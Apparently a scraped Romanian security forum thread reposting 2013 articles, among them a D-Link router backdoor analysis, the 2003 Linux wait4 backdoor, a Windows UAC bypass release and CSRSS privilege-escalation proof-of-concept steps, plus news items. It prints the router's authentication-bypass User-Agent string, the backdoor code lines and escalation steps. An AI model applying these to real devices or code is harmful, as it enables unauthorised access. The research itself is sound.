Nytro

Reverse Engineering a D-Link Backdoor By Craig | October 12, 2013 All right. It’s Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape… . On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware’s web server (/bin/webs) loaded into IDA: Strings inside /bin/webs Based on the above strings listing, the /bin/webs binary is a modified version of thttpd which provides the administrative interface for the router. It appears to have been modified by Alphanetworks (a spin-off of D-Link). They were even thoughtful enough to prepend many of their custom function names with the string “alpha”: Alphanetworks’ custom functions The alpha_auth_check function sounds interesting! This function is called from a couple different locations, most notably from alpha_httpd_parse_request: Function call to alpha_auth_check We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request. Some further examination of the use of register $s2 prior to the alpha_auth_check call indicates that it is a pointer to a data structure which contains char* pointers to various pieces of the received HTTP request, such as HTTP headers and the requested URL: $s2 is a pointer to a data structure We can now define a function prototype for alpha_auth_check and begin to enumerate elements of the data structure: struct http_request_t{ char unknown[0xB8]; char *url; // At offset 0xB8 into the data structure }; int alpha_auth_check(struct http_request_t *request); alpha_auth_check itself is a fairly simple function. It does a few strstr’s and strcmp’s against some pointers in the http_request_t structure, then calls check_login, which actually does the authentication check. If the calls to any of the strstr’s / strcmp’s or check_login succeed, it returns 1; else, it redirects the browser to the login page and returns -1: alpha_auth_check code snippet Those strstr’s look interesting. They take the requested URL (at offset 0xB8 into the http_request_t data structure, as previously noted) and check to see if it contains the strings “graphic/” or “public/”. These are sub-directories under the device’s web directory, and if the requested URL contains one of those strings, then the request is allowed without authentication. It is the final strcmp however, which proves a bit more compelling: An interesting string comparison in alpha_auth_check This is performing a strcmp between the string pointer at offset 0xD0 inside the http_request_t structure and the string “xmlset_roodkcableoj28840ybtide”; if the strings match, the check_login function call is skipped and alpha_auth_check returns 1 (authentication OK). A quick Google for the “xmlset_roodkcableoj28840ybtide” string turns up only a single Russian forum post from a few years ago, which notes that this is an “interesting line” inside the /bin/webs binary. I’d have to agree. So what is this mystery string getting compared against? If we look back in the call tree, we see that the http_request_t structure pointer is passed around by a few functions: It turns out that the pointer at offset 0xD0 in the http_request_t structure is populated by the httpd_parse_request function: Checks for the User-Agent HTTP header Populates http_request_t + 0xD0 with a pointer to the User-Agent header string This code is effectively: if(strstr(header, "User-Agent:") != NULL){ http_request_t->0xD0 = header + strlen("User-Agent:") + strspn(header, " \t"); } Knowing that offset 0xD0 in http_request_t contains a pointer to the User-Agent header, we can now re-construct the alpha_auth_check function: #define AUTH_OK 1#define AUTH_FAIL -1 int alpha_auth_check(struct http_request_t *request) { if(strstr(request->url, "graphic/") || strstr(request->url, "public/") || strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0) { return AUTH_OK; } else { // These arguments are probably user/pass or session info if(check_login(request->0xC, request->0xE0) != 0) { return AUTH_OK; } } return AUTH_FAIL; } In other words, if your browser’s user agent string is “xmlset_roodkcableoj28840ybtide” (no quotes), you can access the web interface without any authentication and view/change the device settings (a DI-524UP is shown, as I don’t have a DIR-100 and the DI-524UP uses the same firmware): Accessing the admin page of a DI-524UP Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected: DIR-100 DI-524 DI-524UP DI-604S DI-604UP DI-604+ TM-G5240 Additionally, several Planex routers also appear to use the same firmware: BRL-04UR BRL-04CW You stay classy, D-Link. Bookmark the permalink. Sursa: Reverse Engineering a D-Link Backdoor - /dev/ttyS0

[h=3]CreateRemoteThread vs. RtlCreateUserThread[/h]In this post i will shed the light on a slight difference between the "CreateRemoteThread" and "RtlCreateUserThread" functions. I will also show how this slight difference could affect your code, esp. if you are implementing an anti-attaching trick. The difference is in the way the CONTEXT structure is initialized for the new thread. Let's first take the "CreateRemoteThread" function in disassembly. On Windows XP SP3, at address 0x7C810550, We can see a call to the non-exported "_BaseInitializeContext@20" function which as its name implies sets initial values for registers of the CONTEXT structure. Here, we focus on only two registers, EIP and EAX which are set in the following manner: 1) The EIP register is set to the address of either "_BaseThreadStartThunk@8" or "_BaseProcessStartThunk@8" depending on the fifth parameter (in this case, the fifth parameter is set to TRUE and EIP is set to the address of "_BaseThreadStartThunk@8"). 2) The EAX register is set to the user-defined entry point (User-defined here means the value passed to the "CreateRemoteThread" function in the "lpStartAddress" parameter). Now the very first thing we conclude is that "BaseThreadStartThunk@8" later executes the user-defined entry point. Now let's take the "RtlCreateUserThread" function in disassembly and see how the CONTEXT structure for the new thread is initialized. As you can see in the image above, a different function, "RtlInitializeContext", is used for this task. Going into this function, we can see that it is as simple as setting : 1)The EAX register to zero. 2) The EIP register to the user-defined entry point. A question arises here!!. what is this useful for? If a thread tries to query its own entry point by calling the "ZwQueryInformationThread" function with the "ThreadInformationClass" parameter set to ThreadQuerySetWin32StartAddress, then the initial value of EAX is the value returned in the "ThreadInformation" parameter. In most cases, this is okay since almost all threads are created by the "CreateRemoteThread" function and hence the user-defined entry point is always returned. But threads created by the "RtlCreateUserThread" function (e.g. threads created by debuggers to attach to running processes) will not be able to query its own entry point using the "ZwQueryInformationThread" function, since the value returned in the "ThreadInformation" parameter will always be zero as the initial value for EAX was zero. Imagine a TLS callback running in the context of the attaching thread and trying to query the thread's entry point by calling the "ZwQueryInformationThread" function as part of detecting the debugger, the entry point returned will be zero since the initial value of EAX was zero. A good solution for this problem is using the "NtQuerySystemInformation" function with the "SystemInformationClass" parameter set to SystemProcessesAndThreadsInformation to get information about all current processes and threads, then locating the proper thread and its SYSTEM_THREAD_INFORMATION structure. Once the right structure is found, the thread entry point can easily be seen in the "StartAddress" member. The code showing how to use the "NtQuerySystemInformation" function to extract threads entry points can be found here. An example demonstrating how to use the "NtQuerySystemInformation" function as anti-attaching trick can be found here. N.B. This topic has been tested on Windows XP SP3. You can follow me on Twitter @waleedassar Sursa: waliedassar: CreateRemoteThread vs. RtlCreateUserThread

Cica e pentru siguranta noastra, ne apara de teroristi. Sclavii americanilor. Fortza Russia!

Da, acum vreo 3 ani am trimis si eu catre studentii din facultate, "de pe" mail-ul profesorului de la care toti erau nerabdatori sa afle raspunsuri. E util pentru caterinca.

Facultatea e necesara! Daca ai diploma de licenta (la o mare parte dintre facultati), practic, primesti cu 16% mai mult la salariu. Normal, nu inveti mare lucru acolo, materii de cacat, cele utile poate nu sunt predate bine... Dar daca iti place si vrei sa lucrezi in domeniu, puneti in pula mea mana si invatati singuri. Cand vine vorba de angajare, trebuie sa le si demonstrati angajatorilor ca stiti ceva. Cum faceti asta? Le aratati ce proiecte ati facut. Ai facut? Faceti. Sau faceti laba. E viitorul vostru, e alegerea voastra.

In niciun caz nu ar fi una in care sa iti dai datele reale: numere de telefon, poze cu tine (care de multe ori contin locatia GPS la care au fost facute), prietenii, locurile pe care le frecventezi... V-as sfatui sa faceti putin curat pe profilul vostru si sa stergeti cat mai multe lucruri personale.

In fine, tema e cumparata, e platita de kwe.

Am incercat 2 carti (random) de C++ si merg. Ai si poza si link direct de download. Care anume nu iti merge?

[h=5]Free e-books. 1.Linux http://www.efytimes.com/e1/fullnews.asp?edid=116902 Top 10 Most Wanted Linux Books 2.Assembly http://www.efytimes.com/e1/fullnews.asp?edid=117964 3.C 35 Free eBooks On C Programming 4.C++ http://www.efytimes.com/e1/fullnews.asp?edid=117660 5.C# http://www.efytimes.com/e1/fullnews.asp?edid=117598 6.Java http://www.efytimes.com/e1/fullnews.asp?edid=117834 7.Python http://www.efytimes.com/e1/fullnews.asp?edid=117094 8.Perl http://efytimes.com/e1/fullnews.asp?edid=117324 9.Ruby 22 Free eBooks On Ruby 10.Javascript http://www.efytimes.com/e1/fullnews.asp?edid=117236 11.JQuery http://www.efytimes.com/e1/fullnews.asp?edid=117488[/h]

Ctrl + F5. Doar la tine e.

Legat de problema cu butoanele, pune si tu un screenshot la pagina. Legat de tema? Copyright? Ha? La cate probleme a avut jegu asta de tema, nu le dau "copyright", le dau muie alora care au facut-o.

#ro0ted Attacking SIP/VoIP Servers by Faith Sursa: https://www.cyberguerrilla.org/blog/?p=15957

Paunch, the author of Blackhole Exploit kit arrested in Russia Wang Wei, The Hacker News - Monday, October 07, 2013 According to a Security Analyst ' Maarten Boone' working at Fox-IT company, the Developer of notorious Blackhole Exploit Kit developer 'Paunch' and his partners were arrested in Russia recently. Blackhole Exploit Kit which is responsible for the majority of web attacks today, is a crimeware that makes it simple for just about anyone to build a botnet. This Malware kit was developed by a hacker who uses the nickname “Paunch” and his Team, has gained wide adoption and is currently one of the most common exploit frameworks used for Web-based malware delivery. The Blackhole exploit kit is a framework for delivering exploits via compromised or third-party websites, serve up a range of old and new exploits for Oracle's Java, Adobe's Flash and other popular software to take control of victim's machines. It the point of writing No Police Authority or Press has confirmed the claim made by Maarten about the arrest of Malware author. Please Stay tuned to THN for updates about the Story. In April, 2013 - Russian hackers and developers behind the Carberp botnet, that stole millions from bank accounts worldwide were also arrested. Read more: Paunch, the author of Blackhole Exploit kit arrested in Russia - The Hacker News Sursa: Paunch, the author of Blackhole Exploit kit arrested in Russia - The Hacker News

[h=1]The Linux Backdoor Attempt of 2003[/h] October 9, 2013 By Ed Felten Josh wrote recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.) Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will. Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy. But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change. What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; [Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.] A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero. Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor. This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up. But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux. Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know. [Post edited (2013-10-09) to correct the spelling of Larry McVoy's name.] Sursa: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

[h=1]Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback'[/h][h=2]Not all the people named in the FBI indictment fit the hacker stereotype [/h] By Greg Sandoval on October 8, 2013 07:11 pm Some of the men indicted last week for allegedly taking part in the scores of denial-of-service attacks launched by hacktivist group Anonymous in 2010 don't fit the stereotype of a pajamas-wearing teen hacker causing havoc from mom's basement. For example, The Verge has learned that defendant Phillip Simpson is a 28-year-old IT professional who works for a test-preparation service. Anthony Tadros, 22, is a student at the University of Connecticut, who ironically once worked as a security analyst for the school, according to his LinkedIn profile. Geoffrey Commander is 65 years old. And then there's Ryan Gubele, a 27-year-old who is a former contract employee for Amazon. In June, Gubele began working as a site reliability engineer for Twitter — and is currently still employed there. It's in my best interest not to answer any questions. Last week, the US Department of Justice alleged in a 28-page indictment that Gubele and the other 12 defendants helped Anonymous, the hacktivist collective, disrupt or cause the collapse of web sites operated by Bank of America, MasterCard and multiple global antipiracy groups. Some of the companies were attacked for refusing to process donations made to WikiLeaks, the group that published leaked US diplomatic cables. Others came under fire for supporting antipiracy efforts. Anonymous dubbed the DDoS campaign Operation Payback. In the indictment, federal prosecutors allege that it was Gubele who aided Anonymous by tracking the effectiveness of the group's attacks on the Motion Picture Association of America, the trade group for the Hollywood studios. They also accuse him of illegally accessing computer systems of at least one of the targets during Operation Payback, which began in September 2010 and ended the following January. The indictment doesn't say whether Gubele played any role in the December 2010 attack on Amazon. According to Gubele's LinkedIn profile, he began working for the web retailer in August 2010 and departed the same month that Operation Payback concluded. Gubele and Simpson did not respond to interview requests. Twitter and Amazon declined to comment. Tadros, the security analyst, said in a text: "It's in my best interest not to answer any questions about my situation while the case is ongoing." Feds likely want to send a message US law enforcement has begun cracking down on computer crime and appears to be making an extra effort to track Anonymous members, who consider themselves activists for social change and come from all over the globe. During the past decade, the group has hacked or launched denial of service attacks against the Church of Scientology, numerous governments, Sony, the New York Stock Exchange, and sites hosting child porn. While numerous arrests have been made, the percentage of Anonymous members tried for computer offenses is believed to be a tiny fraction of the group’s potential members. Nonetheless, the US government likely wants to send a message. Sursa: Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback' | The Verge

Detecting Avast Antivirus Via Web Browsers Description: This is the method I use for detecting avast antivirus. You can use it with other anitviruses too, all what you need is to change the image path. If you tested that with other software/antivirus please post it in the comments below. This is the online demo of the method described: Test_Avast Sursa: Detecting Avast Antivirus Via Web Browsers Banal si eficient. O alta metoda ar fi ca pe un site sa se puna continut blocat, acel continut sa apara intr-un frame ascuns iar cu JS sa se verifice daca apare "content blocked" sau continutul original.

Derbycon 2013 - Pass-The-Hash 2: The Admin’S Revenge - Skip Duckwall, Chris Campbell Description: ome vulnerabilities just can’t be patched. Pass-The-Hash attacks against Windows enterprises are are still successful and are more popular than ever. Since the PTH-Suite was released at BlackHat last year, Microsoft published their guide for mitigating the attack. Skip and Chris will cover some of the short-comings in their strategies and offer practical ways to detect and potentially prevent hashes from being passed on your network. Learn how to stop an attacker’s lateral movement in your enterprise. Bio: “Chris Co-presented PTH talk last year at Blackhat Also spoke at BsidesLV, Derbycon, Shmoocon & BsidesPR www.obscuresec.com @obscuresec Works for Crucial Security (Harris Corp) Skip Co-presented PTH talk last year at Blackhat Also spoken at Defcon, derbycon passing-the-hash.blogspot.com @passingthehash on twitter Works for Accuvant Labs” For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Pass-The-Hash 2: The Admin’S Revenge - Skip Duckwall, Chris Campbell

WiFi Password Dump [TABLE=align: left] [TR] [TD=class: page_subheader]About [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 100%] [TR] [TD=width: 120, align: center] [/TD] [TD=align: justify]WiFi Password Dump is the free command-line tool to quickly recover all the Wireless account passwords stored on your system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information [/TD] [/TR] [TR] [TD] WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in Hex format Password in clear text [/TD] [/TR] [TR] [TD=align: justify] Being command-line tool makes it useful for penetration testers and forensic investigators. For GUI version check out the Wi-Fi Password Decryptor. It works on both 32-bit & 64-bit platforms starting from Windows Vista to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] WiFi Password Secrets[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Depending on the platform, 'Wireless Configuration Manager' uses different techniques and storage locations to securely store the WiFi settings. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]On Vista and higher systems all the wireless parameters including SSID, Authentication method & encrypted Password are stored at following file, [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_code]C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} and all the wireless settings for this device are stored in XML file with random GUID name.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]If you are interested to know how these WiFi settings are stored and how 'WiFi Password Decyptor' actually recovers the passwords, read on to our research article,[/TD] [/TR] [TR] [TD]Exposing the WiFi Password Secrets[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] How to use?[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]WiFi Password Dump is very easy to use tool. It is command-line/console based tool, hence you have to launch it from the command prompt (cmd.exe) as Administrator. Here is the simple usage information Launch command-prompt (cmd.exe) on your system as Administrator. In the cmd prompt move to directory where you have installed or copied WiFiPasswordDump tool Now run the tool by just typing WiFiPasswordDump.exe It will automatically discover and display all the recovered Wireless passwords as shown in screenshot below. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD]Screenshot 1: 'WiFiPasswordDump' showing all the recovered Wireless Passwords from Windows 7 system.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Release History[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0: 8th Oct 2013[/TD] [/TR] [TR] [TD]First public release of WiFi Password Dump.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download WiFi Password Dump v1.0 License : Freeware Platform : Windows Vista, Windows 2008, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] Sursa: WiFi Password Dump : Free Command-line Tool to Recover Wireless Passwords [/TD] [/TR] [/TABLE]

[h=1]PhysicsJS (Yes, a JavaScript Physics engine)[/h] In today's Web Wednesday post we're highlighting something you might think a little oxymoronic, a JavaScript Physics engine. It's still in an Alpha status, but even so, it's looking pretty cool... [h=2]PhysicsJS[/h] A modular, extendable, and easy-to-use physics engine for javascript PhysicsJS is still under development (alpha version 0.5.1), and documentation is unfinished. Feel free to use it, just be warned that the API is in flux and better documentation is on its way! (Contributors and help needed!) [h=4]Features[/h] Use as an AMD Module (requireJS), or global namespace. Modular! Only load what you need. The core library is only 31k minified. Extendable! Don’t like the collision detection algorithm? Replace it with your own! Not tied to a specific renderer. Display it in DOM, HTML5 Canvas, or whatever… Easy! It’s a library written IN javascript… not C compiled into javascript. The syntax is familiar for javascript developers. Extensions to support points, circles, and arbitrary convex polygons. Extensions to support constant gravity, newtonian gravity, collisions, and verlet constraints. The fastest way to get a feel for what's possible is by checking out the Demos. [h=2]Demos[/h] There's even documentation already too. [h=2]https://github.com/wellcaffeinated/PhysicsJS/wiki[/h] Introductory documentation can be found on the PhysicsJS website. The wiki contains more advanced usage instructions. Due to the newness of this library, documentation is non-exhaustive. If there are any points of confusion, please feel free to log an issue or contact me. You can also edit the wiki yourself to fill in the gaps. Any help with documenting is appreciated. [h=4]Topics[/h] Fundamentals Scratchpads - they speed up computations Bodies PubSub Behaviors Collisions Integrators Renderers And the source is officially available too; [h=2]https://github.com/wellcaffeinated/PhysicsJS[/h] Sursa: PhysicsJS (Yes, a JavaScript Physics engine) | Coding4Fun Blog | Channel 9

[h=1]C++ and the Windows Runtime[/h] Date: September 6, 2013 from 9:00AM to 9:35AM Day 3 Speakers: Aleš Hole?ek [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, Windows Phone, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 36.6 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 216.9 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 171.4 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 475.8 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 332.3 MB High Quality WMV (PC, Xbox, MCE) In this talk, Ales discusses the evolution of the Windows platform and the story of its development, and the key role that C++ plays in it. In the spirit of "Going Native", the new platform and application model is written almost exclusively in C++. Sursa: C++ and the Windows Runtime | GoingNative 2013 | Channel 9

Windows 7 UAC whitelist: Code-injection Issue (and more) Quick Windows 7 RTM update: Everything below still applies to the final retail release of Windows 7 (and all updates as of 14/Sep/2011). Quick Windows 8 update: Everything below still applies to the Windows 8 Developer Preview released on 13/Sep/2011. It is early days, of course, but from a quick look it does not seem that anything UAC-related has changed at all in Win8. Contents: Win 7 UAC Code-Injection: Program & source-code Win 7 UAC Code-Injection: Video demonstrations Some Quotes Win 7 UAC Code-Injection: Summary Win 7 UAC Code-Injection: The good news Win 7 UAC Code-Injection: How it works UAC in Vista and Windows 7: Mistakes then and now (Better ways MS could've responded to complaints about Vista.) UAC Comparison: Two file-managers If a whitelist makes sense then it must be user-configurable Previous Windows 7 UAC issues To those saying, "but it requires code to get on the box" To those saying, "but UAC isn't a security boundary" To those saying, "but it's only a beta" Quick response to a couple of newer things Program, Source Code and Step-by-Step Guide While Windows 7 was still in beta Microsoft said this was a non-issue, and ignored my offers to give them full details for several months. so there can't be an issue with making everything public now. Win7ElevateV2.zip (32-bit and 64-bit binaries; use the version for your OS.) Win7ElevateV2_Source.zip (C++ source code, and detailed guide to how it works.) Source in HTML format (for browsing online) Step-by-step guide (description of what the code does) This works against the RTM (retail) and RC1 versions of Windows 7. It probably won't work with the old beta build 7000 due to changes in which apps can auto-elevate. Microsoft could block the binaries via Windows Defender (update: they now do via MSE), or plug the CRYPTBASE.DLL hole, but unless they fix the underlying code-injection / COM-elevation problem the file copy stuff will still work. Fixing only the CRYPTBASE.DLL part, or blocking a particular EXE or DLL, just means someone has to find a slightly different way to take advantage of the file copy part. Finding the CRYPTBASE.DLL method took about 10 minutes so I'd be surprised if finding an alternative took long. Even if the hole is fixed, UAC in Windows 7 will remain unfair on third-party code and inflexible for users who wish to use third-party admin tools. Sursa: Windows 7 UAC whitelist: Code-injection Issue (and more)

[h=1]Linux SNMP MIB Browser[/h] An SNMP MIB browser is an indispensable tool for engineers and system administrators to manage SNMP enabled network devices such as routers, switches, servers and workstations. The information provided by SNMP includes uptime, interface traffic data, routing information, TCP and UDP connection information, installed software, and much more. In this tutorial, I introduce qtmib, an easy-to-use SNMP browser available for Linux and published under GPLv2 license. The program is build as a front-end for net-snmp tools using QT4 library. qtmib browser window qtmib features qtmib offers a number of powerful features: SNMP v1 and v2c support. OID translation. MIB search capabilities. A huge number of built-in MIBs. Support for adding private MIBs. Network discovery. Easy-to-read reports: system, interfaces, routing table, TCP/UDP connections, running process, and installed software, Installation Installation follows the regular ./configure && make && sudo make install Unix pattern. You would need net-snmp tools and QT4 development libraries as dependencies. An Ubuntu .deb package is also provided. Screenshot tour qtmib host selection qtmib network discovery qtmib report selection Sursa: Linux SNMP MIB Browser | l3net - a layer 3 networking blog

CVE-2011-1281 Privilege escalation in CSRSS proof of concept After one years without blogging (all my apologies), I’m back. A few days ago I’ve seen the pwnie awards nominations list, there were lot’s of interesting and sophisticated bug exploitation. But one attract my attention “Privilege escalation in CSRSS” discovered by Matthew ‘j00ru’ Jurczyk. If you want to undestand this vulnerability and the way to exploit it, read this excellent post CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability | j00ru//vx tech blog. And if you’re not familiar with CSRSS I advice you to read this article or this one (in french). So, for writing the PoC we have to follow this steps : Spray the shared WIN32K section, by creating a sufficient amount of USER objects. The section is then going to be mapped to every process running in the context of the local desktop, thus we can perform this step at this early point, Create N instances of a process, each of which will create a single zombie console and then go idle, Kill all N instanes of the processes, Create 3N local threads, (**) Kill 2N threads (in the order described in the “Second Stage” section), Kill the remaining N threads, Emulate the win+u key presses, resulting in a new instance of UTILMAN.EXE being created, Call SendMessage(HWND_BROADCAST,WM_SYSCOMMAND,0xFFF7,0) , triggering the execution of CreateRemoteThread on each of the N freed handles. * – by creating a zombie console, we also mean replacing the original PropertiesProc address (used in kernel32!AllocConsole) with a custom pointer. ** – the technique is very time-sensitive. If any handle is picked / stored on the free-list between steps 3 and 4, than steps 5 and 6 might not succeed in setting up the expected free-list handle layout. I wont speak about first step immediately for different reason. Let’s start with step two “create a single zombie console”, for me it’s the most hard part. We have to code AllocConsole and AllocConsoleInternal (I only scope Windows XP version for the moment). With AllocConsoleInternal we can control the PropRoutine & CtrlRoutine of the console. For conding this function I start googling with “AllocConsoleInternal + PropRoutine + CtrlRoutine” and reach this function definition : BOOL APIENTRY AllocConsoleInternal( IN LPWSTR lpTitle, IN DWORD dwTitleLength, IN LPWSTR lpDesktop, IN DWORD dwDesktopLength, IN LPWSTR lpCurDir, IN DWORD dwCurDirLength, IN LPWSTR lpAppName, IN DWORD dwAppNameLength, IN LPTHREAD_START_ROUTINE CtrlRoutine, IN LPTHREAD_START_ROUTINE PropRoutine, IN OUT PCONSOLE_INFO pConsoleInfo) With some call to ntdll!CsrAllocateCaptureBuffer, ntdll!CsrCaptureMessageBuffer for desktop, title and curent dir memory allocation. And then ntdll!CsrClientCallServer with allocConsole request we will reach winsrv!SrvAllocConsole and then spawn a console. For testing we lunch a broken console and kill his process and his parent process, after that we do a “right clic + proprieties/default” on the broken console and then we have a winsrv!InternalCreateCallbackThread executed with free handle! (the killed parent process handle precisely) Step 3, 4, 5, 6, 8 is quite easy. Step 7 (WIN+U emulation) too but SetKeyboardState and PostMessage doesn’t work, we have to use keybd_event (depreciated) or SendInput to invoke utilman.exe. Therefore, with all this steps we are able to get CSRSS to call CreateRemoteThread with a system process handle and a controlled start address. Now we need step one “Spray the shared WIN32K section of system process with USER object” and it’s done! For this we have to invoke ultiman (WIN+U) which spawn three new process : -> ultiman.exe [NT AUTHORITY\\SYSTEM] +-> ultiman.exe /start [uSER] +–> narrator.exe /UM [uSER] Then we create user object like MessageBox with over long title (32Ko). But ultiman (system) doesn’t share the win32k section with other process at all times. After trying differents unsuccessful methods, I decided contact j00ru who give me the solution. We can inject user object in ultiman (system) if another user (regardless of his privileges) is logged on the machine at the same time. At this moment, I haven’t found explanation of this behaviour. I think it’s something in relation with Desktop/Winstation/Session, if you have some idea tell me. Source of the poc : Index of /prog/blog/allocConsole Thanks to j00ru for his help and all shared knowledge on his blog, hitb and so on! Sursa: CVE-2011-1281 Privilege escalation in CSRSS proof of concept

Microsoft pays Australian hacker $100,000 for finding security holes Ben Grubb and Jim Finkle Date October 9, 2013 - 1:11PM Winning: James Forshaw of security firm Context. Photo: Context Microsoft is paying a well-known Australian hacking expert more than $100,000 for finding security holes in its software, one of the largest bounties awarded to date by a tech company. The company also released a much anticipated update to Internet Explorer, which it said fixes a bug that made users of the browser vulnerable to remote attack. James Forshaw, who heads vulnerability research at Melbourne-based consulting firm Context Information Security, won Microsoft's first $US100,000 ($106,000) bounty for identifying a new "exploitation technique" in Windows, which will allow it to develop defences against an entire class of attacks, the company said. Generous reward: Microsoft. Photo: Bloomberg Forshaw is among the many "white hat" hackers who hack for good and get rewarded for their efforts. Companies such as Apple and Facebook have hall of fame pages on their websites to recognise hackers, and some companies even pay them. Advertisement Forshaw, who is currently travelling to attend a security conference, earned another $US9400 for identifying security bugs in a preview release of Microsoft's Internet Explorer 11 browser, Katie Moussouris, senior security strategist with Microsoft Security Response Centre, said in a blog post. "Over the past decade working in secure development and research, I have discovered many interesting security vulnerabilities with a heavy focus of complex logic bugs," Forshaw said. "I'm keenly interested in the intellectual puzzle of finding novel exploitation techniques and the creativity it requires." To find his winning entry, Forshaw studied the mitigations available today and after brainstorming identified a few potential angles. "Not all were viable but after some persistence I was finally successful." He said receiving recognition for his entry was "exciting" to him and his employer. "It also gives me the satisfaction that I am contributing to improving the security of both Microsoft's and Context's customers." Microsoft unveiled the 